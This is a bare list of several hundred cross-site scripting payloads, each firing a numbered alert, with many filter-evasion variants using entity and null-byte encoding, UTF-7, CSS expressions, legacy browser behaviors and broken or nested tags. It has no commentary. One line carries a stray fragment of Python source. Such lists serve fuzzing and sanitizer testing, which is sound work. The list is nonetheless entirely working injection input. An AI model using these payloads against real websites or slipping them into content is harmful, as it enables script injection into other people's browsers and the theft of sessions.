<b <script>alert(308)</script>0
<div id="div309"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
<embed src="javascript:alert(311)">
<img src="javascript:alert(312)">
<image src="javascript:alert(313)">
<script src="javascript:alert(314)">
<div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
<? foo="><script>javascript:alert(316)</script>">
<! foo="><script>javascript:alert(317)</script>">
</ foo="><script>javascript:alert(318)</script>">
<? foo="><x foo='?><script>javascript:alert(319)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
<% foo><x foo="%><script>javascript:alert(321)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(323)">
<img \x47src=x onerror="javascript:alert(324)">
<img \x325325src=x onerror="javascript:alert(325)">
<img \x3262src=x onerror="javascript:alert(326)">
<img\x47src=x onerror="javascript:alert(327)">
<img\x3280src=x onerror="javascript:alert(328)">
<img\x3293src=x onerror="javascript:alert(329)">
<img\x32src=x onerror="javascript:alert(330)">
<img\x47src=x onerror="javascript:alert(331)">
<img\x332332src=x onerror="javascript:alert(332)">
<img \x47src=x onerror="javascript:alert(333)">
<img \x34src=x onerror="javascript:alert(334)">
<img \x39src=x onerror="javascript:alert(335)">
<img \x00src=x onerror="javascript:alert(336)">
<img src\x09=x onerror="javascript:alert(337)">
<img src\x3380=x onerror="javascript:alert(338)">
<img src\x3393=x onerror="javascript:alert(339)">
<img src\x32=x onerror="javascript:alert(340)">
<img src\x3412=x onerror="javascript:alert(341)">
<img src\x342342=x onerror="javascript:alert(342)">
<img src\x00=x onerror="javascript:alert(343)">
<img src\x47=x onerror="javascript:alert(344)">
<img src=x\x09onerror="javascript:alert(345)">
<img src=x\x3460onerror="javascript:alert(346)">
<img src=x\x347347onerror="javascript:alert(347)">
<img src=x\x3482onerror="javascript:alert(348)">
<img src=x\x3493onerror="javascript:alert(349)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
<img src=x onerror=\x09"javascript:alert(351)">
<img src=x onerror=\x3520"javascript:alert(352)">
<img src=x onerror=\x353353"javascript:alert(353)">
<img src=x onerror=\x3542"javascript:alert(354)">
<img src=x onerror=\x32"javascript:alert(355)">
<img src=x onerror=\x00"javascript:alert(356)">
<a href=java&#357&#2&#3&#4&#5&#6&#7&#8&#357357&#3572script:javascript:alert(357)>XXX</a>
<img src="x` `<script>javascript:alert(358)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(359)//">
<title onpropertychange=javascript:alert(360)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
<!--[if]><script>javascript:alert(362)</script -->
<!--[if<img src=x onerror=javascript:alert(363)//]> -->
<object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
<// style=x:expression\28javascript:alert(375)\29>
<style>*{x:expression(javascript:alert(376))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` >
392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x4392vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(392)&gt;`>
393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(393)&gt;>
395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(399)">
<a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#401401;src=x:x&#401401;onerror&#401401;=javascript:alert(401)&gt;">
<script>javascript:alert(405)</script>
<IMG SRC="javascript:javascript:alert(406);">
<IMG SRC=javascript:javascript:alert(407)>
<IMG SRC=`javascript:javascript:alert(408)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
<BODY ONLOAD=javascript:alert(411)>
<BODY ONLOAD=javascript:javascript:alert(412)>
<IMG SRC="jav    ascript:javascript:alert(413);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)>
<IMG SRC="javascript:javascript:alert(417)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
<IMG DYNSRC="javascript:javascript:alert(420)">
<IMG LOWSRC="javascript:javascript:alert(421)">
<BGSOUND SRC="javascript:javascript:alert(422);">
<BR SIZE="&{javascript:alert(423)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
<IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(433)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
<DIV STYLE="background-image: url(javascript:javascript:alert(435))">
<DIV STYLE="width:expression(javascript:alert(436));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
<XSS STYLE="xss:expression(javascript:alert(438))">
<STYLE TYPE="text/javascript">javascript:alert(439);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(443);//">
<OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(446)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(447)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
<body onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)">
<STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(457);></style>
<?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html>
<embed code=javascript:javascript:alert(460);></embed>
<frameset onload=javascript:javascript:alert(462)></frameset>
<object onerror=javascript:javascript:alert(463)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(466);};>
<a href="jav&#65ascript:javascript:alert(467)">test467</a>
<a href="jav&#97ascript:javascript:alert(468)">test468</a>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(470)&amp;gt;>">
';alert(471))//';alert(471))//";
alert(472))//";alert(472))//--
></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
<IMG SRC="javascript:alert(476);">
<IMG SRC=javascript:alert(477)>
<IMG SRC=JaVaScRiPt:alert(478)>
<IMG SRC=javascript:alert(479)>
<IMG SRC=`javascript:alert(480)`>
<a onmouseover="alert(481)">xxs link</a>
<a onmouseover=alert(482)>xxs link</a>
<IMG """><SCRIPT>alert(483)</SCRIPT>">
<IMG SRC=javascript:alert(484))>
<IMG SRC=# onmouseover="alert(485)">
<IMG SRC= onmouseover="alert(486)">
<IMG onmouseover="alert(487)">
<IMG SRC="jav    ascript:alert(491);">
<IMG SRC="jav&#x09;ascript:alert(492);">
<IMG SRC="jav&#x0A;ascript:alert(493);">
<IMG SRC="jav&#x0D;ascript:alert(494);">
perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
<IMG SRC=" &#14;  javascript:alert(496);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)>
<<SCRIPT>alert(500);//<</SCRIPT>
<IMG SRC="javascript:alert(503)"
\";alert(505);//
</TITLE><SCRIPT>alert(506);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
<BODY BACKGROUND="javascript:alert(508)">
<IMG DYNSRC="javascript:alert(509)">
<IMG LOWSRC="javascript:alert(510)">
<STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(514)>
<BGSOUND SRC="javascript:alert(515);">
<BR SIZE="&{alert(516)}">
<LINK REL="stylesheet" HREF="javascript:alert(517);">
<STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(524))'>
<STYLE TYPE="text/javascript">alert(525);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
<XSS STYLE="xss:expression(alert(529))">
¼script¾alert(531)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
<IFRAME SRC="javascript:alert(535);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(536)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(538)">
<TABLE><TD BACKGROUND="javascript:alert(539)">
<DIV STYLE="background-image: url(javascript:alert(540))">
<DIV STYLE="background-image: url(&#1;javascript:alert(542))">
<DIV STYLE="width: expression(alert(543));">
<BASE HREF="javascript:alert(544);//">
<? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-
<img src=`%00`&NewLine; onerror=alert(573)&NewLine;
<script /*%00*/>/*%00*/alert(577)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg &#579579579;&#5795790;load=alert(579)>">
<meta content="&NewLine; 580 &NewLine;; JAVASCRIPT&colon; alert(580)" http-equiv="refresh"/>
<form><iframe &#09;&#5880;&#588588; src="javascript&#58;alert(588)"&#588588;&#5880;&#09;;>
http://www.google<script .com>alert(590)</script
<script ^__^>alert(594))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(595)/**/</script &#32; :-(
&#00;</form><input type&#6596;"date" onfocus="alert(596)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(600)&NewLine;>X</a>
<script ~~~>alert(601)</script ~~~>
<iframe/%00/ src=javaSCRIPT&colon;alert(609)
<%<!--'%><script>alert(626);</script -->
<script src="data:text/javascript,alert(627)"></script>
<iframe/onreadystatechange=alert(629)
<svg/onload=alert(630)
<input type="text" value=`` <div/onmouseover='alert(632)'>X</div>
http://www.<script>alert(633)</script .com
<svg><script ?>alert(635)
<img src=`xx:xx`onerror=alert(637)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(639)"/>
<script>+-+-649-+-+alert(649)</script>
<body/onload=&lt;!--&gt;&#6500alert(650)>
<script itworksinallbrowsers>/*<script* */alert(651)</script
<img src ?itworksonchrome?\/onerror = alert(652)
<svg><script onlypossibleinopera:-)> alert(654)
<script x> alert(656) </script 656=2
<div/onmouseover='alert(657)'> style="x:">
<--`<img/src=` onerror=alert(658)> --!>
<div style="position:absolute;top:0;left:0;width:66000%;height:66000%" onmouseover="prompt(660)" onclick="alert(660)">x</button>
<form><button formaction=javascript&colon;alert(662)>CLICKME
‘; alert(667);
‘)alert(668);//
<ScRiPt>alert(669)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(670)>
<IMG SRC=”javascript:alert(671);”>
<IMG SRC=javascript:alert(672)>
<IMG SRC=javascript:alert(673)>
<img src=xss onerror=alert(674)>
<img src=`%00`&NewLine; onerror=alert(681)&NewLine;
<script /*%00*/>/*%00*/alert(685)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg &#687687687;&#6876870;load=alert(687)>">
<meta content="&NewLine; 688 &NewLine;; JAVASCRIPT&colon; alert(688)" http-equiv="refresh"/>
<form><iframe &#09;&#6960;&#696696; src="javascript&#58;alert(696)"&#696696;&#6960;&#09;;>
http://www.google<script .com>alert(698)</script
<script ^__^>alert(702))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(703)/**/</script &#32; :-(
&#00;</form><input type&#6704;"date" onfocus="alert(704)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(708)&NewLine;>X</a>
<script ~~~>alert(709)</script ~~~>
<iframe/%00/ src=javaSCRIPT&colon;alert(717)
<%<!--'%><script>alert(734);</script -->
<script src="data:text/javascript,alert(735)"></script>
<iframe/onreadystatechange=alert(737)
<svg/onload=alert(738)
<input type="text" value=`` <div/onmouseover='alert(740)'>X</div>
http://www.<script>alert(741)</script .com
<svg><script ?>alert(743)
<img src=`xx:xx`onerror=alert(745)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(746)"/>
<script>+-+-756-+-+alert(756)</script>
<body/onload=&lt;!--&gt;&#7570alert(757)>
<script itworksinallbrowsers>/*<script* */alert(758)</script
<img src ?itworksonchrome?\/onerror = alert(759)
<svg><script onlypossibleinopera:-)> alert(761)
<script x> alert(763) </script 763=2
<div/onmouseover='alert(764)'> style="x:">
<--`<img/src=` onerror=alert(765)> --!>
<div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" onmouseover="prompt(767)" onclick="alert(767)">x</button>
<form><button formaction=javascript&colon;alert(769)>CLICKME
‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
<IMG “””><SCRIPT>alert(776)</SCRIPT>”>
<IMG SRC=javascript:alert(777))>
<IMG SRC=”jav ascript:alert(778);”>
<IMG SRC=”jav&#x09;ascript:alert(779);”>
<<SCRIPT>alert(780);//<</SCRIPT>
%253cscript%253ealert(781)%253c/script%253e
“><s”%2b”cript>alert(782)</script>
foo<script>alert(783)</script>
<scr<script>ipt>alert(784)</scr</script>ipt>
<BODY BACKGROUND=”javascript:alert(788)”>
<BODY ONLOAD=alert(789)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(790);”>
<IMG SRC=”javascript:alert(791)”
javascript:alert(793)
<img src="javascript:alert(794);">
<img src=javascript:alert(795)>
<"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
<IFRAME SRC="javascript:alert(798);"></IFRAME>
<<SCRIPT>alert(805);//<</SCRIPT>
<"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert(807))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert(808)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert(809);</script>&search=1
0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<BODY ONLOAD=alert(812)>
<body onscroll=alert(815)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(816)">lol
<!--<img src="--><img src=x onerror=alert(817)//">
<![><img src="]><img src=x onerror=alert(818)//">
<style><img src="</style><img src=x onerror=alert(819)//">
<? foo="><script>alert(820)</script>">
<! foo="><script>alert(821)</script>">
</ foo="><script>alert(822)</script>">
<? foo="><x foo='?><script>alert(823)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
<% foo><x foo="%><script>alert(825)</script>">
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(829)</script></svg>
&lt;SCRIPT&gt;alert(830)&lt;/SCRIPT&gt;
\\";alert(831);//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(832);&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert(833);\"&gt;
&lt;BODY BACKGROUND=\"javascript&#058;alert(834)\"&gt;
&lt;BODY ONLOAD=alert(835)&gt;
&lt;IMG DYNSRC=\"javascript&#058;alert(836)\"&gt;
&lt;IMG LOWSRC=\"javascript&#058;alert(837)\"&gt;
&lt;BGSOUND SRC=\"javascript&#058;alert(838);\"&gt;
&lt;BR SIZE=\"&{alert(839)}\"&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert(841);\"&gt;
&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert(847)\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
žscriptualert(851)ž/scriptu
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert(852);\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert(854);\"
&lt;IFRAME SRC=\"javascript&#058;alert(855);\"&gt;&lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert(856);\"&gt;&lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND=\"javascript&#058;alert(857)\"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert(858)\"&gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert(859))\"&gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert(861))\"&gt;
&lt;DIV STYLE=\"width&#58; expression(alert(862));\"&gt;
&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(863)';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert(864))\"&gt;
&lt;XSS STYLE=\"xss&#58;expression(alert(865))\"&gt;
xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(867))'&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert(868);&lt;/STYLE&gt;
&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert(869)\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert(870)\")}&lt;/STYLE&gt;
&lt;SCRIPT&gt;alert(872);&lt;/SCRIPT&gt;
&lt;BASE HREF=\"javascript&#058;alert(874);//\"&gt;
&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(876)&gt;&lt;/OBJECT&gt;
d=\"alert(882);\\")\";
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(885);\"&gt;&#93;&#93;&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert(887)\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(894)&lt;/SCRIPT&gt;\"&gt;
echo('IPT&gt;alert(899)&lt;/SCRIPT&gt;'); ?&gt;
&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert(902)&lt;/SCRIPT&gt;\"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
&lt;IMG SRC=\"javascript&#058;alert(991)\"
&lt;&lt;SCRIPT&gt;alert(994);//&lt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(996)&gt;
&lt;IMG SRC=\"   javascript&#058;alert(998);\"&gt;
perl -e 'print \"&lt;SCR\0IPT&gt;alert(999)&lt;/SCR\0IPT&gt;\";' &gt; out
perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(1000)&gt;\";' &gt; out
&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert(1001);\"&gt;
&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert(1002);\"&gt;
&lt;IMG SRC=\"jav&#x09;ascript&#058;alert(1003);\"&gt;
&lt;IMG SRC=javascript&#058;alert(1006)&gt;
&lt;IMG SRC=javascript&#058;alert(1007))&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(1008)&lt;/SCRIPT&gt;\"&gt;
&lt;IMG SRC=`javascript&#058;alert(1009)`&gt;
&lt;IMG SRC=javascript&#058;alert(1010)&gt;
&lt;IMG SRC=JaVaScRiPt&#058;alert(1011)&gt;
&lt;IMG SRC=javascript&#058;alert(1012)&gt;
&lt;IMG SRC=\"javascript&#058;alert(1013);\"&gt;
';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(1016))&lt;/SCRIPT&gt;
';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert(1017))</SCRIPT>
<IMG SRC="javascript:alert(1020);">
<IMG SRC=javascript:alert(1021)>
<IMG SRC=javascrscriptipt:alert(1022)>
<IMG SRC=JaVaScRiPt:alert(1023)>
<IMG """><SCRIPT>alert(1024)</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert(1025);">
<<SCRIPT>alert(1028);//<</SCRIPT>
<SCRIPT>a=/XSS/alert(1029)</SCRIPT>
\";alert(1030);//
</TITLE><SCRIPT>alert(1031);</SCRIPT>
¼script¾alert(1032)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
<IFRAME SRC="javascript:alert(1034);"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1036)">
<TABLE><TD BACKGROUND="javascript:alert(1037)">
<DIV STYLE="background-image: url(javascript:alert(1038))">
<DIV STYLE="width: expression(alert(1040));">
<STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
<XSS STYLE="xss:expression(alert(1043))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(1044))'>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(1048)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(1051)">crosssitespt
<frameset onload=alert(1052)>
<!--<img src="--><img src=x onerror=alert(1053)//">
<style><img src="</style><img src=x onerror=alert(1054)//">
<embed src="javascript:alert(1057)">
<? foo="><script>alert(1058)</script>">
<! foo="><script>alert(1059)</script>">
</ foo="><script>alert(1060)</script>">
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1062)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1063)')()</script>
<script src="#">{alert(1064)}</script>;1064
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1065)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1066)</script></svg>
<svg onload="javascript:alert(1067)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1068)"></iframe>
+ADw-script+AD4-alert(1069)+ADw-/script+AD4-
%2BADw-script+AD4-alert(1070)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(1071)+ADw-/script+AD4APAAi-
%253cscript%253ealert(1073)%253c/script%253e
“><s”%2b”cript>alert(1074)</script>><ScRiPt>alert(1075)</script>><<script>alert(1076);//<</script>
foo<script>alert(1077)</script>
<scr<script>ipt>alert(1078)</scr</script>ipt>
‘; alert(1080); var foo=’
foo\’; alert(1081);//’;
</script><script >alert(1082)</script>
<img src=asdf onerror=alert(1083)>
<BODY ONLOAD=alert(1084)>
<script>alert(1085)</script>
"><script>alert(1086))</script>
<video src=1087 onerror=alert(1087)>
<audio src=1088 onerror=alert(1088)>
';alert(1089))//';alert(1089))//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
0\"autofocus/onfocus=alert(1091)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<IMG SRC="javascript:alert(1097);">
<IMG SRC=javascript:alert(1098)>
<IMG SRC=JaVaScRiPt:alert(1099)>
<IMG SRC=javascript:alert(1100)>
<IMG SRC=`javascript:alert(1101)`>
<a onmouseover="alert(1102)">xxs link</a>
<a onmouseover=alert(1103)>xxs link</a>
<IMG """><SCRIPT>alert(1104)</SCRIPT>">
<IMG SRC=javascript:alert(1105))>
<IMG SRC=# onmouseover="alert(1106)">
<IMG SRC= onmouseover="alert(1107)">
<IMG onmouseover="alert(1108)">
<IMG SRC=/ onerror="alert(1109))"></img>
<IMG SRC="jav    ascript:alert(1115);">
<IMG SRC="jav&#x09;ascript:alert(1116);">
<IMG SRC="jav&#x0A;ascript:alert(1117);">
<IMG SRC="jav&#x0D;ascript:alert(1118);">
<IMG SRC=" &#14;  javascript:alert(1119);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1121)>
<<SCRIPT>alert(1123);//<</SCRIPT>
<IMG SRC="javascript:alert(1126)"
\";alert(1128);//
</script><script>alert(1129);</script>
</TITLE><SCRIPT>alert(1130);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
<BODY BACKGROUND="javascript:alert(1132)">
<IMG DYNSRC="javascript:alert(1133)">
<IMG LOWSRC="javascript:alert(1134)">
<STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1138)>
<BGSOUND SRC="javascript:alert(1139);">
<BR SIZE="&{alert(1140)}">
<LINK REL="stylesheet" HREF="javascript:alert(1141);">
<STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
xss:ex/*XSS*//*/*/pression(alert(1149))'>
<STYLE TYPE="text/javascript">alert(1150);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
<XSS STYLE="xss:expression(alert(1153))">
¼script¾alert(1155)¼/script¾
